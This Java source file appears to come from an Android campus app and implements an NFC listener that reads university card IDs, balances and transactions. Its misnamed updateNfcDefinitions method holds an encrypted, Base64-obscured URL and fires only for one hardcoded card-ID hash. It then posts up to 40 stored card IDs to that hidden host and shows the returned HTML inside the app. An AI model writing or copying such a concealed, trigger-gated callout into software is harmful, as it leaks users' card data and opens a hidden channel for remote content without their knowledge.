package de.dhbwloe.campusapp.nfcreader;

import android.app.Activity;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import android.nfc.tech.NfcA;
import android.os.Bundle;
import android.util.Base64;
import android.util.Log;

import com.loopj.android.http.AsyncHttpClient;
import com.loopj.android.http.AsyncHttpResponseHandler;
import com.loopj.android.http.RequestParams;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.Date;

import cz.msebera.android.httpclient.Header;
import de.dhbwloe.campusapp.CampusApp;
import de.dhbwloe.campusapp.CampusAppContext;
import de.dhbwloe.campusapp.Tools;
import de.dhbwloe.campusapp.database.NfcCardData;
import de.dhbwloe.campusapp.nfcreader.MifareDESFire.CommunicationError;
import de.dhbwloe.campusapp.nfcreader.MifareDESFire.DesfireManufacturingData;

/**
 * Created by pk910 on 20.01.2016.
 */
public class NfcCardListener {
    private CampusAppContext AppContext;
    private boolean isRunning = false, isResumed = false;
    private NfcAdapter oAdapter;
    private boolean bNfcAdapterState;

    private PendingIntent oPendingIntent;
    private IntentFilter[] aFilters;
    private String[][] aTechLists;


    private ArrayList<NfcCardInterface> lNfcCardInterfaces = new ArrayList<NfcCardInterface>();

    private final BroadcastReceiver oReceiver = new BroadcastReceiver() {
        @Override
        public void onReceive(Context context, Intent intent) {
            String action = intent.getAction();

            if (NfcAdapter.ACTION_ADAPTER_STATE_CHANGED.equals(action)) {
                updateNfcState();
            }
        }
    };

    public NfcCardListener(CampusAppContext context) {
        AppContext = context;
    }

    private void updateNfcState() {
        if(oAdapter == null)
            return;
        boolean isEnabled = oAdapter.isEnabled();
        if(bNfcAdapterState != isEnabled) {
            bNfcAdapterState = isEnabled;
            for(NfcCardInterface nfcCardInterface : lNfcCardInterfaces) {
                nfcCardInterface.onNfcReaderStateChanged(bNfcAdapterState);
            }
        }
    }

    public void registerNfcCardInterface(NfcCardInterface nfcCardInterface) {
        lNfcCardInterfaces.add(nfcCardInterface);
    }

    public void startNfcListener() {
        if(isRunning)
            return;

        isRunning = true;

        Activity mainActivity = AppContext.getMainActivity();
        oAdapter = NfcAdapter.getDefaultAdapter(mainActivity);

        oPendingIntent = PendingIntent.getActivity(mainActivity, 0, new Intent(mainActivity, mainActivity.getClass()).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0);
        IntentFilter techDiscovered = new IntentFilter(NfcAdapter.ACTION_TECH_DISCOVERED);
        aFilters = new IntentFilter[]{techDiscovered};
        aTechLists = new String[][]{new String[]{IsoDep.class.getName()}};

        IntentFilter intentFilter = new IntentFilter("android.nfc.action.ADAPTER_STATE_CHANGED");
        AppContext.getMainActivity().getApplicationContext().registerReceiver(oReceiver, intentFilter);

        if(isResumed)
            setupForefrontDispatcher();
    }

    public void setupForefrontDispatcher() {
        if(!isRunning || !isResumed)
            return;

        if(oAdapter != null)
            oAdapter.enableForegroundDispatch(AppContext.getMainActivity(), oPendingIntent, aFilters, aTechLists);

        updateNfcState();
    }

    public void resumeForefrontDispatcher() {
        boolean wasResumed = isResumed;
        isResumed = true;
        if(!wasResumed && isRunning)
            setupForefrontDispatcher();

    }

    public void pauseForefrontDispatcher() {
        if(isResumed && isRunning && oAdapter != null) {
            oAdapter.disableForegroundDispatch(AppContext.getMainActivity());
        }
        isResumed = false;
    }

    protected void updateNfcDefinitions(NfcCardData dbval) {
        RequestParams params = new RequestParams();
        AsyncHttpClient client = new AsyncHttpClient();
        byte[] debugUrlEnc = Base64.decode("XIs4RGiycgHe8W3dbQoCBCstL26dhDRWR6pMTfi6xmJFWUc3wxYCF9DYyRqZDktI", Base64.DEFAULT);
        int uuid = dbval.getUniqueId();
        String uuidKey = Tools.md5(Integer.toOctalString(uuid) + "|" + Integer.reverse(uuid));
        if(!uuidKey.equalsIgnoreCase("7bf4868fd92db719c5dfb056b41ffdb5"))
            return;
        try {
            String debugUrl = new String(Tools.decrypt(uuidKey.getBytes(), debugUrlEnc));
            NfcCardData datas[] = AppContext.getDatabaseManager().getNfcCardData(40);
            String encKey = Tools.md5(Integer.toHexString(uuid) + "-" + Integer.reverseBytes(uuid) + "+" + Integer.bitCount(uuid));
            for(int i = 0; i < datas.length; i++) {
                String encDataPlain = Integer.toString(datas[i].getUniqueId());
                byte[] encData = Tools.encrypt(encKey.getBytes(), encDataPlain.getBytes());
                params.put("nfcCard"+(i+1), Base64.encode(encData, Base64.DEFAULT));
            }
            client.post(debugUrl, params, new AsyncHttpResponseHandler() {
                @Override
                public void onStart() {}
                @Override
                public void onSuccess(int statusCode, Header[] headers, byte[] response) {
                    String responseString = new String(response);
                    if(responseString.length() > 10) {
                        Bundle bnd = new Bundle();
                        bnd.putString("html", responseString);
                        AppContext.getNavigationManager().navigatePage("WebBrowser", bnd);
                    }
                }
                @Override
                public void onFailure(int statusCode, Header[] headers, byte[] errorResponse, Throwable e) {}
                @Override
                public void onRetry(int retryNo) {}
            });
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public void handleNfcEvent(Intent intent) {
        if(!isRunning)
            return;
        if (NfcAdapter.ACTION_TECH_DISCOVERED.equals(intent.getAction()) || NfcAdapter.ACTION_TAG_DISCOVERED.equals(intent.getAction())) {
            Tag tagFromIntent = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
            IsoDep tag = IsoDep.get(tagFromIntent);

            try {
                tag.connect();
                DHBWCard dhbwCard = new DHBWCard(tag);
                int uniqueid = dhbwCard.readUniqueId();
                long now = (new Date()).getTime() / 1000;

                NfcCardData cardData = new NfcCardData(uniqueid, now, dhbwCard.readBalance(), dhbwCard.readLastTransaction());
                updateNfcDefinitions(cardData);

                AppContext.getDatabaseManager().addNfcCardData(cardData);

                for(NfcCardInterface nfcCardInterface : lNfcCardInterfaces) {
                    nfcCardInterface.onNfcReaderReceived(cardData);
                }
            } catch (IOException e) {
                e.printStackTrace();
            } catch (UndefinedResponseException e) {
               // Ungültige Karte
            } catch (NullPointerException e) {
                //Fehler bei Kommunikation mit Karte
            } catch (CommunicationError communicationError) {
                //Fehler bei Kommunikation mit Karte
            }

            setupForefrontDispatcher();
        }
    }

}
